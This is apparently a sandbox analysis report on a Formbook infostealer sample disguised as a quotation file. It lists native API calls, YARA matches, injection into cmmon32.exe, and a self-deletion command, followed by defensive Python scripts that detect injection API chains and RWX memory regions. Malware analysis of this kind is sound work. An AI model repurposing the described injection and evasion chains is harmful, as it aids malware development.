          Source: initial sample :: Static PE information: Filename: QUOTATION LIST FOR NEW ORDER.exe
          Contains functionality to call native functions
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041825D NtReadFile,
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041838C NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0481B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0481AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0481A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0481A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04819770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0481A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_03058390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_03058260 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_030582E0 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_030581B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0305838C NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0305825D NtReadFile,
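The native API table above is flat, so the first thing a reviewer does is regroup it per process and look for the API chains behind the summary's "process hollowing", "maps a DLL or memory area into another process" and "queues an APC in another process" verdicts. The Python below is an added example, not Joe Sandbox code and not code from the sample: it parses a copied subset of the entries above, collects the Nt* functions each process reaches, flags the chains, and checks a second thing a reader can verify against the table: the functions at 0x0305xxxx in cmmon32.exe (process 12) sit at exactly the same offsets as those at 0x0041xxxx in the sample (process 10), i.e. the same Formbook code mapped at 0x03040000 instead of 0x00400000, which is also the region the memory YARA match for process 12 points at. The chain definitions are this example's own choice, not the sandbox's rules.

```python
"""Triage of the 'Code function' entries in a sandbox report.

Added example, not part of the report or of Joe Sandbox: it parses the
"<process>_<pass>_<address> <api>,<api>," entries, groups the native API each
process reaches, flags the injection API chains a reviewer looks for, and checks
whether two processes carry the same code at a constant relocation offset.
"""
import re
from collections import Counter, defaultdict

# Subset of the entries from the report above, copied as printed (the extraction
# fused the Source cell onto the detail cell, so both spacings are accepted).
REPORT_EXCERPT = """\
Source: C:\\Users\\user\\Desktop\\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_004181B0 NtCreateFile,
Source: C:\\Users\\user\\Desktop\\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00418260 NtReadFile,
Source: C:\\Users\\user\\Desktop\\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_004182E0 NtClose,
Source: C:\\Users\\user\\Desktop\\QUOTATION LIST FOR NEW ORDER.exeCode function: 10_2_00418390 NtAllocateVirtualMemory,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_04819840 NtDelayExecution,LdrInitializeThunk,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_048199A0 NtCreateSection,LdrInitializeThunk,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_04819540 NtReadFile,LdrInitializeThunk,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_04819780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_048198A0 NtWriteVirtualMemory,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_0481B040 NtSuspendThread,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_048199D0 NtCreateProcessEx,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_0481AD30 NtSetContextThread,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_04819950 NtQueueApcThread,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_04819A20 NtResumeThread,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_048197A0 NtUnmapViewOfSection,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_0481A3B0 NtGetContextThread,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_0481A770 NtOpenThread,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_03058390 NtAllocateVirtualMemory,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_03058260 NtReadFile,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_030582E0 NtClose,
Source: C:\\Windows\\SysWOW64\\cmmon32.exeCode function: 12_2_030581B0 NtCreateFile,
"""

ENTRY = re.compile(r"Code function:\s*(\d+)_(\d+)_([0-9A-Fa-f]{8})\s+([A-Za-z0-9_,]+)")

# API sets whose joint presence in one process is the usual signature of each
# technique (this example's own choice of chains, not the sandbox's rules).
CHAINS = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"},
    "section mapping injection": {"NtCreateSection", "NtMapViewOfSection"},
    "APC injection": {"NtOpenThread", "NtQueueApcThread"},
    "thread context hijack": {"NtSuspendThread", "NtGetContextThread", "NtSetContextThread"},
}


def parse_entries(text):
    """Yield (process, pass, address, [functions]) for every Code function entry."""
    for m in ENTRY.finditer(text):
        proc, dump_pass, addr, funcs = m.groups()
        names = [f for f in funcs.split(",") if f]
        yield int(proc), int(dump_pass), int(addr, 16), names


def native_api_by_process(text):
    """Map process number -> set of Nt* functions referenced from its code."""
    api = defaultdict(set)
    for proc, _, _, names in parse_entries(text):
        api[proc].update(n for n in names if n.startswith("Nt"))
    return dict(api)


def detect_chains(api_names):
    return sorted(name for name, required in CHAINS.items() if required <= api_names)


def triage(text):
    return {proc: detect_chains(api) for proc, api in native_api_by_process(text).items()}


def relocation_delta(text, proc_a, proc_b):
    """Most common (addr_b - addr_a) over functions both processes reference, with its count."""
    addrs = defaultdict(lambda: defaultdict(set))
    for proc, _, addr, names in parse_entries(text):
        for name in names[:1]:  # the first name is the callee the stub at this address wraps
            addrs[name][proc].add(addr)
    deltas = Counter()
    for per_proc in addrs.values():
        for a in per_proc.get(proc_a, ()):
            for b in per_proc.get(proc_b, ()):
                deltas[b - a] += 1
    if not deltas:
        return None
    return deltas.most_common(1)[0]


if __name__ == "__main__":
    for proc, chains in sorted(triage(REPORT_EXCERPT).items()):
        print(f"process {proc}: {', '.join(chains) or 'no injection chain'}")
    delta, hits = relocation_delta(REPORT_EXCERPT, 10, 12)
    print(f"process 12 carries process 10's code at +0x{delta:08X} ({hits} functions line up)")
```

On the excerpt, process 10 only reaches file and memory APIs while process 12 satisfies all four chains, and the relocation check returns +0x02C40000 with four functions agreeing, which is 0x03040000 minus 0x00400000.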
          Detected potential crypto function
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_00401026
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_00401030
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041C089
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041C8A4
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041BAC8
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041BB26
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_00408C4B
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_00408C50
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041B493
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0041B496
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048020A0
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048A20A8
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047E841F
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04891002
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047EB090
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_04802581
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047D0D20
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047F4120
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047DF900
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048A2D07
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047ED5E0
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048A1D55
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_047F6E30
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048A2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0480EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_048A1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0305C8A4
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_03042FB0
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0305C578
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_03042D90
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_03048C4B
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_03048C50
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: 12_2_0305B496
          Found potential string decryption / allocating functions
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Code function: String function: 047DB150 appears 35 times
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000000.242234639.00000000006CC000.00000002.00020000.sdmp :: Binary or memory string: OriginalFilenameTup.exe: vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exe, 00000009.00000002.302259006.00000000001DC000.00000002.00020000.sdmp :: Binary or memory string: OriginalFilenameTup.exe: vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.375144383.000000000139F000.00000040.00000001.sdmp :: Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000000.304360441.00000000006DC000.00000002.00020000.sdmp :: Binary or memory string: OriginalFilenameTup.exe: vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exe :: Binary or memory string: OriginalFilenameTup.exe: vs QUOTATION LIST FOR NEW ORDER.exe
          Source: QUOTATION LIST FOR NEW ORDER.exe :: Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE :: Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.raw.unpack, type: UNPACKEDPE :: Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE :: Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack, type: UNPACKEDPE :: Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY :: Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORY :: Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORY :: Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
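Both YARA tables above (the community-rule matches near the top of this section and the full rule metadata here) name their memory sources by dump file, and the dump name carries the facts a reviewer wants: which process, which base address, and what page protection the matched region had. The Python below is an added example, not Joe Sandbox code: it decodes those names and reports which matched regions were both writable and executable. The layout <process>.<pass>.<id>.<base>.<protection>.<type>.sdmp is an assumption inferred from the report itself: the first field matches the 10/12 process numbers used in the Code function entries, the fourth is a 64-bit address (0x400000, 0x540000, 0x3040000 above), and the fifth reads cleanly as the standard Windows PAGE_* constants (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE). The sixth field is left undecoded. On these lines the result is Formbook matched in three RWX regions of process 10, one of them at its own image base 0x400000, and in one RWX plus one read-write region of process 12.

```python
"""Decoder for the memory-dump names (*.sdmp) that the YARA matches refer to.

Added example, not vendor code. Assumed name layout (inferred from the report):
<process>.<pass>.<id>.<base address>.<protection>.<type>.sdmp, with <protection>
holding a standard Windows PAGE_* value. The <type> field is left undecoded.
"""
import re
from dataclasses import dataclass

PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0xF0  # any PAGE_EXECUTE* value
WRITABLE_MASK = 0xCC    # PAGE_READWRITE, PAGE_WRITECOPY and their executable variants

SDMP = re.compile(
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp"
)
# Accepts both the fused "MEMORYMatched rule:" form the extraction produced and a cleaned-up one.
HIT = re.compile(r"Source:\s*(\S+\.sdmp),\s*type:\s*MEMORY\W*Matched rule:\s*(.+)$")


@dataclass(frozen=True)
class MemoryDump:
    process: int
    dump_pass: int
    dump_id: int
    base: int
    protection: int
    region_type: int

    @classmethod
    def from_name(cls, name):
        m = SDMP.search(name)
        if not m:
            raise ValueError(f"not a dump name: {name}")
        proc, dump_pass, dump_id, base, prot, rtype = m.groups()
        return cls(int(proc, 16), int(dump_pass, 16), int(dump_id), int(base, 16), int(prot, 16), int(rtype, 16))

    @property
    def protection_name(self):
        return PAGE_PROTECTION.get(self.protection & 0xFF, f"0x{self.protection:X}")

    @property
    def is_rwx(self):
        p = self.protection & 0xFF
        return bool(p & EXECUTABLE_MASK) and bool(p & WRITABLE_MASK)


def yara_hits(text):
    """Return [(MemoryDump, rule description)] for every memory-scan match line."""
    hits = []
    for line in text.splitlines():
        m = HIT.search(line.strip())
        if m:
            hits.append((MemoryDump.from_name(m.group(1)), m.group(2).strip()))
    return hits


def matched_regions(text):
    """process -> sorted [(base, protection name)] for regions that matched at least one rule."""
    regions = {}
    for dump, _ in yara_hits(text):
        regions.setdefault(dump.process, set()).add((dump.base, dump.protection_name))
    return {proc: sorted(v) for proc, v in regions.items()}


def rwx_matches(text):
    return sorted({dump for dump, _ in yara_hits(text) if dump.is_rwx}, key=lambda d: (d.process, d.base))


# Match lines copied from the report above (rule metadata shortened).
REPORT_EXCERPT = """\
Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group
Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein
Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group
Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein
Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group
"""

if __name__ == "__main__":
    for proc, regions in sorted(matched_regions(REPORT_EXCERPT).items()):
        print(f"process {proc}:", ", ".join(f"0x{base:X} {prot}" for base, prot in regions))
    print("Formbook matched in RWX memory:", [f"{d.process}:0x{d.base:X}" for d in rwx_matches(REPORT_EXCERPT)])
```

The RWX protection on the region at 0x400000 in process 10 is the detail worth noting: an image base that is writable and executable after the process has started is what a hollowed or self-overwritten image looks like, which is consistent with the summary's process hollowing verdict.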
          Source: QUOTATION LIST FOR NEW ORDER.exe :: Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: QUOTATION LIST FOR NEW ORDER.exe :: Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
          Source: classification engine :: Classification label: mal100.troj.evad.winEXE@9/1@5/2
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION LIST FOR NEW ORDER.exe.log
          Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_01
          Source: QUOTATION LIST FOR NEW ORDER.exe :: Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe :: File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
          Multi AV Scanner detection for submitted file
          Source: QUOTATION LIST FOR NEW ORDER.exe :: Virustotal: Detection: 61%
          Source: QUOTATION LIST FOR NEW ORDER.exe :: Metadefender: Detection: 37%
          Source: QUOTATION LIST FOR NEW ORDER.exe :: ReversingLabs: Detection: 63%
          Source: unknown :: Process created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Process created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe (2 identical entries)
          Source: C:\Windows\explorer.exe :: Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
          Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Process created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe (2 identical entries)
          Source: C:\Windows\SysWOW64\cmmon32.exe :: Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: QUOTATION LIST FOR NEW ORDER.exe :: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: QUOTATION LIST FOR NEW ORDER.exe :: Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: QUOTATION LIST FOR NEW ORDER.exe :: Static file information: File size 1347072 > 1048576
          Source: QUOTATION LIST FOR NEW ORDER.exe :: Static PE information: Raw size of .text is bigger than: 0x100000 < 0x148400
          Source: QUOTATION LIST FOR NEW ORDER.exe :: Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.343228042.000000000E7F0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.374856007.000000000120F000.00000040.00000001.sdmp, cmmon32.exe, 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION LIST FOR NEW ORDER.exe, 0000000A.00000002.374856007.000000000120F000.00000040.00000001.sdmp, cmmon32.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.343228042.000000000E7F0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe :: Code function: 10_2_0040607C push esi; ret
